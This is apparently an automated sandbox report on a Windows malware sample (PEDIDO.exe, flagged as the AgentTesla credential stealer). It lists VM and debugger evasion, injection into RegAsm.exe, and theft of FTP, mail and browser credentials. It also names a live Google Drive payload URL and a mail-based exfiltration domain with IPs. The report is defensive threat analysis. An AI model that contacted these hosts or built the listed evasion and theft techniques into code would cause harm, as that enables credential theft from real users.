            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\PEDIDO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\PEDIDO.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: PEDIDO.exe, 00000002.00000002.42591955596.00000000022D0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: PEDIDO.exe, 00000002.00000002.42591955596.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47233899544.00000000007F0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: PEDIDO.exe, 00000002.00000002.42591373555.0000000000614000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXERY
            Source: RegAsm.exe, 00000005.00000002.47233899544.00000000007F0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1_AIH9WQXGFFSAI2OVLXIWPSY325XMIRC
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5956Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PEDIDO.exeSystem information queried: ModuleInformation
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: RegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWP
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 00000005.00000002.47235473464.0000000000EFB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: PEDIDO.exe, 00000002.00000002.42591373555.0000000000614000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exerY
            Source: RegAsm.exe, 00000005.00000002.47233899544.00000000007F0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC
            Source: PEDIDO.exe, 00000002.00000002.42591955596.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47233899544.00000000007F0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: PEDIDO.exe, 00000002.00000002.42593504742.0000000004C39000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: RegAsm.exe, 00000005.00000002.47235473464.0000000000EFB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWIJc6
            Source: RegAsm.exe, 00000005.00000002.47237699647.0000000002919000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
            Source: PEDIDO.exe, 00000002.00000002.42591955596.00000000022D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\PEDIDO.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00A46950 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\PEDIDO.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B00000
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: C:\Users\user\Desktop\PEDIDO.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe'
            Source: RegAsm.exe, 00000005.00000002.47237238978.00000000014C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000005.00000002.47237238978.00000000014C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000005.00000002.47237238978.00000000014C0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000005.00000002.47237238978.00000000014C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2404, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: Yara matchFile source: 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2404, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2404, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1Credentials in Registry1Security Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion341Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion341Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery115Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650 Sample: PEDIDO.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 19 tccinfaes.com 2->19 21 mail.tccinfaes.com 2->21 23 6 other IPs or domains 2->23 31 Multi AV Scanner detection for domain / URL 2->31 33 Found malware configuration 2->33 35 Antivirus detection for URL or domain 2->35 37 6 other signatures 2->37 8 PEDIDO.exe 1 2->8         started        signatures3 process4 signatures5 39 Writes to foreign memory regions 8->39 41 Tries to detect Any.run 8->41 43 Hides threads from debuggers 8->43 11 RegAsm.exe 11 8->11         started        15 RegAsm.exe 8->15         started        process6 dnsIp7 25 tccinfaes.com 188.93.227.195, 49799, 587 CLARANET-ASClaraNETLTDGB Portugal 11->25 27 drive.google.com 172.217.168.46, 443, 49791 GOOGLEUS United States 11->27 29 googlehosted.l.googleusercontent.com 172.217.18.97, 443, 49792 GOOGLEUS United States 11->29 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 55 3 other signatures 11->55 17 conhost.exe 11->17         started        51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->53 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PEDIDO.exe24%VirustotalBrowse
            PEDIDO.exe8%ReversingLabsWin32.Trojan.Mucc
            PEDIDO.exe100%AviraTR/AD.Nekark.lwket

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            2.0.PEDIDO.exe.400000.0.unpack100%AviraTR/AD.Nekark.lwketDownload File

            Domains

            SourceDetectionScannerLabelLink
            tccinfaes.com3%VirustotalBrowse
            mail.tccinfaes.com11%VirustotalBrowse
            x1.i.lencr.org0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://mail.tccinfaes.com11%VirustotalBrowse
            http://mail.tccinfaes.com100%Avira URL Cloudmalware
            https://ZjJPdvMOyw165opG2hLg.orgD0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://x1.i.lencr.org/0%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://ZjJPdvMOyw165opG2hLg.org0%Avira URL Cloudsafe
            http://cps.letsencrypt.org00%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            http://x1.c.lencr.org/00%Avira URL Cloudsafe
            http://x1.i.lencr.org/00%Avira URL Cloudsafe
            http://tccinfaes.com0%Avira URL Cloudsafe
            http://r3.o.lencr.org00%Avira URL Cloudsafe
            http://x1.i.lencr.org/H0%Avira URL Cloudsafe
            https://ZjJPdvMOyw165opG2hLg.orgt-0%Avira URL Cloudsafe
            http://GkEcfT.com0%Avira URL Cloudsafe
            http://r3.i.lencr.org/0)0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            tccinfaes.com
            188.93.227.195
            truetrueunknown
            drive.google.com
            172.217.168.46
            truefalse
              high
              googlehosted.l.googleusercontent.com
              172.217.18.97
              truefalse
                high
                edge-web.dual-gslb.spotify.com
                35.186.224.25
                truefalse
                  high
                  spclient.wg.spotify.com
                  unknown
                  unknownfalse
                    high
                    mail.tccinfaes.com
                    unknown
                    unknowntrueunknown
                    x1.i.lencr.org
                    unknown
                    unknownfalseunknown
                    doc-0c-88-docs.googleusercontent.com
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-0c-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055jl54qaa9s37lc8j7fnoiuafqn/1634146200000/00014782062933200622/*/1_aiH9wqXGFfSAi2OVlXiWPSY325xMIrC?e=downloadfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://mail.tccinfaes.comRegAsm.exe, 00000005.00000002.47247239985.000000001DD0C000.00000004.00000001.sdmptrue
                        • 11%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://ZjJPdvMOyw165opG2hLg.orgDRegAsm.exe, 00000005.00000002.47247072813.000000001DCF0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://doc-0c-88-docs.googleusercontent.com/$RegAsm.exe, 00000005.00000002.47235182001.0000000000ECD000.00000004.00000020.sdmpfalse
                          high
                          http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://x1.i.lencr.org/RegAsm.exe, 00000005.00000002.47235666189.0000000000F1B000.00000004.00000020.sdmp, 2D85F72862B55C4EADD9E66E06947F3D.5.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://DynDns.comDynDNSRegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://ZjJPdvMOyw165opG2hLg.orgRegAsm.exe, 00000005.00000002.47247072813.000000001DCF0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://doc-0c-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/d4i6055jRegAsm.exe, 00000005.00000003.42564732729.0000000000F0B000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.47235473464.0000000000EFB000.00000004.00000020.sdmpfalse
                            high
                            http://cps.letsencrypt.org0RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.c.lencr.org/0RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://x1.i.lencr.org/0RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tccinfaes.comRegAsm.exe, 00000005.00000002.47247239985.000000001DD0C000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://r3.o.lencr.org0RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000005.00000002.47246765132.000000001DCAB000.00000004.00000001.sdmpfalse
                              high
                              http://x1.i.lencr.org/HRegAsm.exe, 00000005.00000002.47252949580.000000001FDBB000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://drive.google.com/lRegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmpfalse
                                high
                                https://ZjJPdvMOyw165opG2hLg.orgt-RegAsm.exe, 00000005.00000002.47247072813.000000001DCF0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://GkEcfT.comRegAsm.exe, 00000005.00000002.47246057313.000000001DC11000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://r3.i.lencr.org/0)RegAsm.exe, 00000005.00000002.47253108213.000000001FDDA000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://drive.google.com/dRegAsm.exe, 00000005.00000002.47234868425.0000000000E88000.00000004.00000020.sdmpfalse
                                  high
                                  https://doc-0c-88-docs.googleusercontent.com/RegAsm.exe, 00000005.00000002.47235182001.0000000000ECD000.00000004.00000020.sdmpfalse
                                    high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    172.217.168.46
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    188.93.227.195
                                    tccinfaes.comPortugal
                                    8426CLARANET-ASClaraNETLTDGBtrue
                                    172.217.18.97
                                    googlehosted.l.googleusercontent.comUnited States
                                    15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:1650
                                    Start date:13.10.2021
                                    Start time:19:28:14
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 8s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:PEDIDO.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
